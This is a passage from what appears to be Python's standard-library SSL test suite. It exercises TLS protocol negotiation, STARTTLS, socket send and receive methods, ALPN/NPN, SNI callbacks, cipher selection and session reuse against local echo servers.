try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# check that it is really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# SIGNED_CERTFILE2 (commonName 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if alg1 not in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
